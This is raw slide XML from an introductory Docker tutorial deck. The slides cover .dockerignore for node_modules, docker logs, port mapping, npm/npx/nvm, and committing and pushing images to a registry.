        <p:spPr>
          <a:xfrm>
            <a:off x="215550" y="1214775"/>
            <a:ext cx="8793300" cy="3621900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>You should never copy node_modules directory inside the container</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>That's why we put node_modules inside .dockerignore file</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="705250"/>
            <a:ext cx="8520600" cy="126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980">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How i can check if the application is running inside the container ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3980">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1359" name="Google Shape;1359;p217"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041450" y="2214700"/>
            <a:ext cx="6466500" cy="19101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3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container logs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker logs </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="248050"/>
            <a:ext cx="8520600" cy="126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3980">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port Mapping</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3980">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1365" name="Google Shape;1365;p218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1861050"/>
            <a:ext cx="8697000" cy="2975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500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Host Machine Port —--Open--&gt; Container Port</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 4000          —------&gt;   4000</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5669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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Node package managers</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1371" name="Google Shape;1371;p219"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1765000"/>
            <a:ext cx="8697000" cy="30519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4000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>npm = node package manager</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>npx  = node package execute</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nvm = Node Version Manager</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="793925"/>
            <a:ext cx="8520600" cy="3788400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker login</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>winpty docker login</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container stop</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container commit</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker image push</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="81150" y="265525"/>
            <a:ext cx="8981700" cy="452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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If you want to create a image from a stopped container you have to commit it.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container commit [OPTIONS] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STOPEDCONTNAME/ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ACCOUNT/[REPOSITORY[:TAG]]</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>	                                                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker commit cranky_saha oklabs/anil_image1:v1</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1282700" y="1658300"/>
            <a:ext cx="7128300" cy="2887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900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker image push [OPTIONS] Account/NAME[:Tag]</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9FA"/>
              </a:highlight>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2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker image push oklabs/anil_image4:v2 </a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1387" name="Google Shape;1387;p222"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503675" y="239025"/>
            <a:ext cx="8323500" cy="10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solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If you want to upload your image to docker registry you have to use docker push</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23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540300" y="1094575"/>
            <a:ext cx="8028600" cy="39144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2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>There are some basic concepts you’ll need to learn and they are:</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-396875" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2650"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Containers</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-396875" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2650"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Images</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-396875" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2650"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Registries</a:t>
            </a:r>
